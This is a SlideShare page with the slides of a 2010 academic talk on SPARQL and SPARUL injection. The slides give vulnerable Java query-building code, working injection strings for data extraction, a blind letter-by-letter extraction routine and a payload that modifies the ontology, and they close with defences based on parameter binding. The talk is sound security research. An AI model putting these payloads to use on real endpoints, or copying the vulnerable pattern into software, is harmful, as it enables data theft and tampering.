SlideShare une entreprise Scribd logo

Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages

Pablo Orduña
Pablo Orduña

Presenation at JSWEB2010, Valencia, September 2010

Technologie
1  sur  25
Télécharger pour lire hors ligne
Introduction Vulnerable code samples Addressing code injection Conclusions Addressing Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages Pablo Ordu˜a, Aitor Almeida, Unai Aguilera, Xabier Laiseca, n Diego L´pez-de-Ipi˜a, Aitor G´mez-Goiri o n o September 9th, 2010 Future Internet - Elkarlaneko ikerkuntza estrategikorako programa; ETORTEK 2008 img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Introduction The Semantic Web is based on a set of technologies: XML RDF OWL ... img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Query Languages New technologies have been developed to query the ontologies later later RDQL − − SPARQL − − SPARUL −→ −→ These new query languages are based on SQL RDQL and SPARQL → Read-only query languages introduces SPARUL (SPARQL/Update) − − − − modification − − −→ capabilities SPARQL Sample: 1 PREFIX injection: <http://www.morelab.deusto.es/ injection.owl#> 2 SELECT ?p1 3 WHERE { 4 ?p1 a injection:Person . 5 } img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Introduction Vulnerable code samples Query Languages Addressing code injection Security issues Conclusions Security issues The use of these new query languages introduce vulnerabilities already found in a bad use of query languages Attacks like SQL Injection, LDAP Injection or even XPath Injection are already well known Libraries provide tools to sanitize user input in these languages A proper usage of the query languages is required in order to face new techniques, including: (Blind) SPARQL Injection SPARUL Injection img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection Introducing SPARQL Injection The following query is assumed to retrieve the friends of a user whom fullName is provided by the variable name The ontology is available in http://www.morelab.deusto.es/injection.owl img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 " + 4 "WHERE {" + 5 " ?p1 a injection:Person . " + 6 " ?p2 a injection:Person . " + 7 " ?p1 injection:fullName ’" + name + "’ . " + 8 " ?p1 injection:isFriendOf ?p2 . " + 9 " ?p1 injection:fullName ?name1 . " + 10 " ?p2 injection:fullName ?name2 . " + 11 "}"; 12 Query query = QueryFactory.create(queryString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection Introducing SPARQL Injection This code can be exploited to retrieve any information in the ontology The problem is that the variable name has not been sanitized This variable can include SPARQL code, and thus modify the query itself A variable with malicious content can be found in the next slide img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Appending the Strings 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + name + "’ . " + 7 " ?p1 injection:isFriendOf ?p2 . " + 8 " ?p1 injection:fullName ?name1 . " + 9 " ?p2 injection:fullName ?name2 . " + 10 "}"; 11 String name = "Pablo Orduna’ . " + 12 "?b1 a injection:Building . " + 13 "?b1 injection:name ?name1 . " + 14 "} #"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Appending the Strings 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + "Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?name1 . " + 9 " } #" + "’ . " + 10 " ?p1 injection:isFriendOf ?p2 . " + 11 " ?p1 injection:fullName ?name1 . " + 12 " ?p2 injection:fullName ?name2 . " + 13 "}"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions The final query 1 String queryString = 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?name1 ?name2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?name1 . " + 9 " } #" + /* From this point everything 10 is commented and thus ignored */ "’ . " + 11 " ?p1 injection:isFriendOf ?p2 . " + 12 " ?p1 injection:fullName ?name1 . " + 13 " ?p2 injection:fullName ?name2 . " + 14 "}"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARQL Injection This code will return the name of the building instead of the name of a user It is possible to use the flexibility of SPARQL to perform other kind of queries retrieving any information in the ontology img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection Introducing Blind SPARQL Injection The previous sample was especially vulnerable since it returned a string It is possible to retrieve any information as a string Strings are usually not retrieved in SPARQL, but individuals What if the returning value is an individual? It’s still possible to retrieve any information If it’s possible to know if a given query is true or false, it’s possible to iteratively retrieve any information The following code retrieves the individuals themselves It’s possible to know if the query provided or not the individuals img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection 1 String queryString = 2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 3 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 4 "SELECT ?p1 ?p2 " + 5 "WHERE {" + 6 " ?p1 a injection:Person . " + 7 " ?p2 a injection:Person . " + 8 " ?p1 injection:fullName ’" + name + "’ˆˆxsd :string . " + 9 " ?p1 injection:isFriendOf ?p2 . " + 10 "}"; 11 Query query = QueryFactory.create(queryString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection Once again, the variable name has not been sanitized So it’s still possible to inject SPARQL code The injected code can’t return a building or the building name But, adding a condition like “does the building name start by this letter” we will get: The common results → so the building name starts by that letter No results → so the building name does not start by that letter img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection 1 String queryString = /* PREFIXES ... */ 2 "SELECT ?p1 ?p2 " + 3 "WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + name + "’ˆˆxsd :string . " + 7 " ?p1 injection:isFriendOf ?p2 . " + 8 "}"; 9 String name = "Pablo Orduna’ . " + 10 "?b1 a injection:Building . " + 11 "?b1 injection:name ?buildingName . " + 12 "FILTER regex(?buildingName, "ˆ" + s + ".*") . " + 13 "} #"; // }:-D img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions The final query would be. . . 1 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?p1 ?p2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?buildingName . " + 9 " FILTER regex(?buildingName, "ˆ" + s + ".*") . " + 10 " } #" + /* from here ignored*/ "’ˆˆxsd:string . " + 11 " ?p1 injection:isFriendOf ?p2 . }"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Querying recursively. . . 1 public static String recursively(String letters) throws Exception{ 2 for(int i = 0; i < POSSIBLE_LETTERS.length(); ++ i){ 3 char c = POSSIBLE_LETTERS.charAt(i); 4 if(tryBlind(letters + c)){ 5 System.out.println(c); 6 return "" + c + recursively(letters + c); 7 } 8 } 9 return ""; 10 } img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection It is possible to optimize this system using binary search Performing queries using Regular Expressions like ˆ[A-M].* to know if the char is between the char A and M Given a charset of length 64, we would reduce the number of iterations from 64 times 10 (640) to 6 times 10 (60) Using the whole UTF-16 charset, it would reduce the number of iterations from 65536 times 10 (655360) to 16 times 10 (160) The point is that it’s possible to retrieve any information in the ontology independently from the values returned by the query img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection Introducing SPARQL/Update Injection All the previous examples are executed in read-only query languages SPARUL introduces the chance to modify the ontology INSERT, MODIFY and DELETE statements are available The following sample modifies the fullName of the resource injection:Pablo, setting it to the value of the variable name img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection 1 String updateString = "PREFIX injection: <http:// www.morelab.deusto.es/injection.owl#> " + 2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 3 "DELETE {" + 4 " injection:Pablo injection:fullName ?name1 "+ 5 "} WHERE {" + 6 " injection:Pablo injection:fullName ?name1" + 7 "}n INSERT {" + 8 " injection:Pablo injection:fullName ’" + name + "’ˆˆxsd:string" + 9 "}"; 10 UpdateRequest update = UpdateFactory.create( updateString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection 1 String name = "Pablo Ordunya’ˆˆxsd:string" + 2 "} n " + 3 "INSERT {" + 4 " injection:Pablo injection:isFriendOf injection:EvilMonkey" + 5 "} #"; // }:-D 6 String result = sample.run(name); With this vulnerability, it is possible to modify the whole ontology. img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Vulnerable code samples Introduction Addressing code injection Conclusions Addressing code injection Mechanisms provided by the library must be used (if provided) Not as simple as scaping the ’ characters: the string u0027 is a simple quote, just as in Java 1 System.out.println("au0022.length() + u0022b".length()); 2 // This code prints "2", the result of ("a".length() + "b".length()) 3 // since u0022 will be replaced by " even if it is commented or inside 4 // String img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Vulnerable code samples Introduction Addressing code injection Conclusions Frameworks In Jena, the initialBinding argument can be used in the QueryExecutionFactory 1 // initial binding 2 QuerySolutionMap initialBinding = new QuerySolutionMap(); 3 RDFNode parameterizedName = model.createLiteral( name); 4 initialSetting.add("thename", parameterizedName); 5 6 // Perform the query 7 Query query = QueryFactory.create(queryString); 8 QueryExecution qe = QueryExecutionFactory.create( query, model, initialBinding); 9 ResultSet results = qe.execSelect(); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Vulnerable code samples Addressing code injection Conclusions Conclusions Not sanitizing the user input might add a set of security vulnerabilities in our systems In the paper it is presented how new query languages inherit security issues present in older query languages, and therefore they should also be taken into account when working with them img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
Introduction Vulnerable code samples Addressing code injection Conclusions Questions? DeustoTech - Internet http://www.morelab.deusto.es Pablo Ordu˜an pablo.orduna@deusto.es Aitor Almeida aitor.almeida@deusto.es Unai Aguilera unai.aguilera@deusto.es Xabier Laiseca xabier.laiseca@deusto.es Diego L´pez-de-Ipi˜a o n dipina@deusto.es Aitor G´mez-Goiri o aitor.gomez@deusto.es img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .

Recommandé

Rr 7944
Rr 7944Rr 7944
Rr 7944fangjiafu
 
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-Automation
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-AutomationDevSecOps: A Secure SDLC in the Age of DevOps and Hyper-Automation
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-AutomationAlex Senkevitch
 
Research Overview
Research OverviewResearch Overview
Research Overviewavinashvarna
 
Application Security, in Six Parts (HackPra 2012)
Application Security, in Six Parts (HackPra 2012)Application Security, in Six Parts (HackPra 2012)
Application Security, in Six Parts (HackPra 2012)johnwilander
 
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It Poses
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It PosesEnterprise Java: Just What Is It and the Risks, Threats, and Exposures It Poses
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It PosesAlex Senkevitch
 
Designing Experiment Agnostic Remote Laboratories
Designing Experiment Agnostic Remote LaboratoriesDesigning Experiment Agnostic Remote Laboratories
Designing Experiment Agnostic Remote LaboratoriesPablo Orduña
 
Taller Ria
Taller RiaTaller Ria
Taller RiaPablo Orduña
 
Mumbai Moods
Mumbai MoodsMumbai Moods
Mumbai Moodsrajshah
 

Recommandé

Rr 7944
Rr 7944Rr 7944
Rr 7944fangjiafu
 
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-Automation
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-AutomationDevSecOps: A Secure SDLC in the Age of DevOps and Hyper-Automation
DevSecOps: A Secure SDLC in the Age of DevOps and Hyper-AutomationAlex Senkevitch
 
Research Overview
Research OverviewResearch Overview
Research Overviewavinashvarna
 
Application Security, in Six Parts (HackPra 2012)
Application Security, in Six Parts (HackPra 2012)Application Security, in Six Parts (HackPra 2012)
Application Security, in Six Parts (HackPra 2012)johnwilander
 
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It Poses
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It PosesEnterprise Java: Just What Is It and the Risks, Threats, and Exposures It Poses
Enterprise Java: Just What Is It and the Risks, Threats, and Exposures It PosesAlex Senkevitch
 
Designing Experiment Agnostic Remote Laboratories
Designing Experiment Agnostic Remote LaboratoriesDesigning Experiment Agnostic Remote Laboratories
Designing Experiment Agnostic Remote LaboratoriesPablo Orduña
 
Taller Ria
Taller RiaTaller Ria
Taller RiaPablo Orduña
 
Mumbai Moods
Mumbai MoodsMumbai Moods
Mumbai Moodsrajshah
 
Taller Test Driven Development
Taller Test Driven DevelopmentTaller Test Driven Development
Taller Test Driven DevelopmentPablo Orduña
 
GWT 2 Is Smarter Than You
GWT 2 Is Smarter Than YouGWT 2 Is Smarter Than You
GWT 2 Is Smarter Than YouRobert Cooper
 
WebLab-Deusto [TARET3]
WebLab-Deusto [TARET3]WebLab-Deusto [TARET3]
WebLab-Deusto [TARET3]Pablo Orduña
 
DeustoTech Talk: ACROSS project
DeustoTech Talk: ACROSS projectDeustoTech Talk: ACROSS project
DeustoTech Talk: ACROSS projectPablo Orduña
 
MVP mit dem Google Web Toolkit
MVP mit dem Google Web ToolkitMVP mit dem Google Web Toolkit
MVP mit dem Google Web ToolkitCenarion Information Systems GmbH
 
GWT – Google Web Toolkit in der Praxis
GWT – Google Web Toolkit in der PraxisGWT – Google Web Toolkit in der Praxis
GWT – Google Web Toolkit in der PraxisCenarion Information Systems GmbH
 
SPARQL/RDQL/SPARUL Injection
SPARQL/RDQL/SPARUL InjectionSPARQL/RDQL/SPARUL Injection
SPARQL/RDQL/SPARUL InjectionMoreLab
 
App Sec Eu08 Sec Frm Not In Code
App Sec Eu08 Sec Frm Not In CodeApp Sec Eu08 Sec Frm Not In Code
App Sec Eu08 Sec Frm Not In CodeSamuele Reghenzi
 
Enterprise Cloud Security - Concepts Mash-up
Enterprise Cloud Security - Concepts Mash-upEnterprise Cloud Security - Concepts Mash-up
Enterprise Cloud Security - Concepts Mash-upDileep Kalidindi
 
Securing your web apps before they hurt the organization
Securing your web apps before they hurt the organizationSecuring your web apps before they hurt the organization
Securing your web apps before they hurt the organizationAntonio Fontes
 
Pangolin whitepaper
Pangolin whitepaperPangolin whitepaper
Pangolin whitepapermattotamhe
 
OWASP Overview of Projects You Can Use Today - DefCamp 2012
OWASP Overview of Projects You Can Use Today - DefCamp 2012OWASP Overview of Projects You Can Use Today - DefCamp 2012
OWASP Overview of Projects You Can Use Today - DefCamp 2012DefCamp
 
163 166
163 166163 166
163 166Editor IJARCET
 
163 166
163 166163 166
163 166Editor IJARCET
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Secure JEE Architecture and Programming 101
Secure JEE Architecture and Programming 101Secure JEE Architecture and Programming 101
Secure JEE Architecture and Programming 101Mario-Leander Reimer
 
Software Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity ModelsSoftware Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity ModelsMarco Morana
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2ssuser18349f1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWARE
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWAREDESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWARE
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWAREAyanda Demilade
 

Contenu connexe

En vedette

Taller Test Driven Development
Taller Test Driven DevelopmentTaller Test Driven Development
Taller Test Driven DevelopmentPablo Orduña
 
GWT 2 Is Smarter Than You
GWT 2 Is Smarter Than YouGWT 2 Is Smarter Than You
GWT 2 Is Smarter Than YouRobert Cooper
 
WebLab-Deusto [TARET3]
WebLab-Deusto [TARET3]WebLab-Deusto [TARET3]
WebLab-Deusto [TARET3]Pablo Orduña
 
DeustoTech Talk: ACROSS project
DeustoTech Talk: ACROSS projectDeustoTech Talk: ACROSS project
DeustoTech Talk: ACROSS projectPablo Orduña
 

En vedette (6)

Taller Test Driven Development
Taller Test Driven DevelopmentTaller Test Driven Development
Taller Test Driven Development
 
GWT 2 Is Smarter Than You
GWT 2 Is Smarter Than YouGWT 2 Is Smarter Than You
GWT 2 Is Smarter Than You
 
WebLab-Deusto [TARET3]
WebLab-Deusto [TARET3]WebLab-Deusto [TARET3]
WebLab-Deusto [TARET3]
 
DeustoTech Talk: ACROSS project
DeustoTech Talk: ACROSS projectDeustoTech Talk: ACROSS project
DeustoTech Talk: ACROSS project
 
MVP mit dem Google Web Toolkit
MVP mit dem Google Web ToolkitMVP mit dem Google Web Toolkit
MVP mit dem Google Web Toolkit
 
GWT – Google Web Toolkit in der Praxis
GWT – Google Web Toolkit in der PraxisGWT – Google Web Toolkit in der Praxis
GWT – Google Web Toolkit in der Praxis
 

Similaire à Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages

SPARQL/RDQL/SPARUL Injection
SPARQL/RDQL/SPARUL InjectionSPARQL/RDQL/SPARUL Injection
SPARQL/RDQL/SPARUL InjectionMoreLab
 
App Sec Eu08 Sec Frm Not In Code
App Sec Eu08 Sec Frm Not In CodeApp Sec Eu08 Sec Frm Not In Code
App Sec Eu08 Sec Frm Not In CodeSamuele Reghenzi
 
Enterprise Cloud Security - Concepts Mash-up
Enterprise Cloud Security - Concepts Mash-upEnterprise Cloud Security - Concepts Mash-up
Enterprise Cloud Security - Concepts Mash-upDileep Kalidindi
 
Securing your web apps before they hurt the organization
Securing your web apps before they hurt the organizationSecuring your web apps before they hurt the organization
Securing your web apps before they hurt the organizationAntonio Fontes
 
Pangolin whitepaper
Pangolin whitepaperPangolin whitepaper
Pangolin whitepapermattotamhe
 
OWASP Overview of Projects You Can Use Today - DefCamp 2012
OWASP Overview of Projects You Can Use Today - DefCamp 2012OWASP Overview of Projects You Can Use Today - DefCamp 2012
OWASP Overview of Projects You Can Use Today - DefCamp 2012DefCamp
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Secure JEE Architecture and Programming 101
Secure JEE Architecture and Programming 101Secure JEE Architecture and Programming 101
Secure JEE Architecture and Programming 101Mario-Leander Reimer
 
Software Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity ModelsSoftware Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity ModelsMarco Morana
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2ssuser18349f1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWARE
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWAREDESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWARE
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWAREAyanda Demilade
 
Making DevSecOps a Reality in your Spring Applications
Making DevSecOps a Reality in your Spring ApplicationsMaking DevSecOps a Reality in your Spring Applications
Making DevSecOps a Reality in your Spring ApplicationsHdiv Security
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIAguestfdcb8a
 
SmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_ExploitationSmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_ExploitationMalachi Jones
 

Similaire à Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages (20)

SPARQL/RDQL/SPARUL Injection
SPARQL/RDQL/SPARUL InjectionSPARQL/RDQL/SPARUL Injection
SPARQL/RDQL/SPARUL Injection
 
App Sec Eu08 Sec Frm Not In Code
App Sec Eu08 Sec Frm Not In CodeApp Sec Eu08 Sec Frm Not In Code
App Sec Eu08 Sec Frm Not In Code
 
Enterprise Cloud Security - Concepts Mash-up
Enterprise Cloud Security - Concepts Mash-upEnterprise Cloud Security - Concepts Mash-up
Enterprise Cloud Security - Concepts Mash-up
 
Securing your web apps before they hurt the organization
Securing your web apps before they hurt the organizationSecuring your web apps before they hurt the organization
Securing your web apps before they hurt the organization
 
Pangolin whitepaper
Pangolin whitepaperPangolin whitepaper
Pangolin whitepaper
 
OWASP Overview of Projects You Can Use Today - DefCamp 2012
OWASP Overview of Projects You Can Use Today - DefCamp 2012OWASP Overview of Projects You Can Use Today - DefCamp 2012
OWASP Overview of Projects You Can Use Today - DefCamp 2012
 
163 166
163 166163 166
163 166
 
163 166
163 166163 166
163 166
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Secure JEE Architecture and Programming 101
Secure JEE Architecture and Programming 101Secure JEE Architecture and Programming 101
Secure JEE Architecture and Programming 101
 
Software Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity ModelsSoftware Security Initiative And Capability Maturity Models
Software Security Initiative And Capability Maturity Models
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWARE
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWAREDESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWARE
DESIGN AND IMPLEMENTATION OF DATA ENCRYPTION SOFTWARE
 
Unit 08: Security for Web Applications
Unit 08: Security for Web ApplicationsUnit 08: Security for Web Applications
Unit 08: Security for Web Applications
 
Making DevSecOps a Reality in your Spring Applications
Making DevSecOps a Reality in your Spring ApplicationsMaking DevSecOps a Reality in your Spring Applications
Making DevSecOps a Reality in your Spring Applications
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
SmartphoneHacking_Android_Exploitation
